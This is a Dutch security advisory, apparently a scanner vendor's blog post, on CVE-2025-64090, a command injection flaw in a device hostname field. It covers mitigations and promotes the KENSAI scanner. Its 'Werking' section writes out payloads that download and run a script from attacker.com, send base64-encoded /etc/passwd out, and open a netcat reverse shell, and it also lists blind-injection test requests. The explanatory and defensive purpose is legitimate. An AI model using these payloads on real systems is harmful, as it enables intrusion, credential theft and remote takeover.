CVE-2025-64090: Geauthenticeerde Command Injection via Apparaat-Hostname
Kort samengevat: Geauthenticeerde aanvallers kunnen willekeurige OS-commando's uitvoeren door shell-metatekens te injecteren in het hostname-veld van het apparaat. CVSS 10.0. Een veelvoorkomende kwetsbaarheidsklasse in netwerkapparaten en embedded systemen die consequent tot kritieke impact leidt.
CVSS 10.0 — KRITIEK
| Veld | Detail |
|---|---|
| CVE ID | CVE-2025-64090 |
| Ernst | KRITIEK (CVSS 3.1: 10.0) |
| Type kwetsbaarheid | OS Command Injection (CWE-78) |
| Gepubliceerd | 9 januari 2026 |
| Authenticatie vereist | Ja (lage privileges) |
| Aanvalsvector | Netwerk |
Wat is CVE-2025-64090?
CVE-2025-64090 is een command injection-kwetsbaarheid waarbij het configuratieveld voor de apparaat-hostname ongesaneerd wordt doorgegeven aan een onderliggend shell-commando. Door shell-metatekens (;, |, `, $()) in de hostname-waarde in te voegen, kunnen geauthenticeerde aanvallers uitbreken uit de bedoelde commandocontext en willekeurige OS-commando's uitvoeren met de rechten van het managementproces van het apparaat — doorgaans root.
Deze kwetsbaarheidsklasse komt veel voor in netwerkapparaten, IoT-hardware, routers, firewalls en embedded Linux-systemen waar webgebaseerde managementinterfaces shell-commando's opbouwen uit door gebruikers aangeleverde configuratiewaarden zonder correcte sanering.
Elke geauthenticeerde gebruiker — ook accounts met lage privileges — kan commando-uitvoering op rootniveau bereiken. In omgevingen met standaard- of zwakke wachtwoorden wordt dit effectief niet-geauthenticeerde exploitatie.
Werking van de command injection
# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)
# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh
# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`
# Subshell:
$(id > /var/www/html/pwned.txt)
# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh
Getroffen versies
Raadpleeg het leveranciersadvies voor specifieke hardwaremodellen en firmwareversies. Netwerkapparaten met webgebaseerde managementinterfaces die hostname-configuratie blootstellen, vormen het primaire risico-oppervlak.
Detectiemethoden
Testen op hostname-injectie
# Manual test: submit hostname with command injection payload # Use time-delay to confirm blind injection POST /admin/network/hostname hostname=test%3Bsleep%205 # If response delays ~5 seconds: vulnerable # Out-of-band confirmation: hostname=test%3Bnslookup+attacker.burpcollaborator.net
🔍 KENSAI-detectie: De apparaat-beveiligingsscanner van KENSAI test managementinterfacevelden zoals hostname, DNS, NTP en SNMP-configuratie op OS command injection. CVE-2025-64090-patronen zijn opgenomen in de beoordelingsprofielen voor netwerkapparaten.
Mitigatiestappen
- Pas direct de firmware-update van de leverancier toe.
- Invoervalidatie: hostname-velden mogen alleen alfanumerieke tekens en koppeltekens accepteren (conform RFC 952/1123).
- Gebruik veilige API's: vervang het opbouwen van shell-commando's door systeemaanroepen die argumentenarrays accepteren (geen shell-interpolatie).
- Beperk de managementinterface: beperk toegang tot de management-UI tot vertrouwde IP-bereiken via firewallregels.
- Wijzig standaardcredentials: zorg dat alle managementaccounts sterke, unieke wachtwoorden gebruiken.
- Netwerksegmentatie: isoleer managementinterfaces van netwerken die toegankelijk zijn voor gebruikers.
KENSAI scant netwerkapparaten en managementinterfaces op command injection-kwetsbaarheden, waaronder CVE-2025-64090. Spoor kwetsbare apparaten op voordat aanvallers voet aan de grond krijgen.
Scan netwerkapparaten gratis